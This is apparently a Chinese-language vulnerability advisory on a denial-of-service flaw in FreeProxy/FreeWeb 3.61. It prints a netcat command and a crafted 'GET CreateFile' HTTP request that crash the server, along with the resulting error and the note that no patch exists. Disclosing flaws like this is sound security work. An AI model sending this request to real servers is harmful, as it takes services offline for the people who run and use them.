FreeProxy/FreeWeb 存在DoS缺陷
涉及程序:
FreeProxy/FreeWeb 3.61版
描述:
FreeProxy/FreeWeb程序的CreateFile函数存在DoS缺陷
详细: FreeProxy/FreeWeb 是一款共享计算机internet连接的免费程序。
FreeProxy/FreeWeb程序的CreateFile函数存在缺陷,当攻击者通过向目标服务器发送精心构造的HTTP连接请求,要求调用CreateFile函数时,能导致目标服务器崩溃:
C:>nc 192.168.1.100 80
GET CreateFile HTTP/1.0
**Application Crashes**
成功利用该缺陷,服务器将返回下列错误信息:
Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation
攻击方法:
参考“详细”栏
解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.alphalink.com.au/~gregr/index.html
附加信息:
无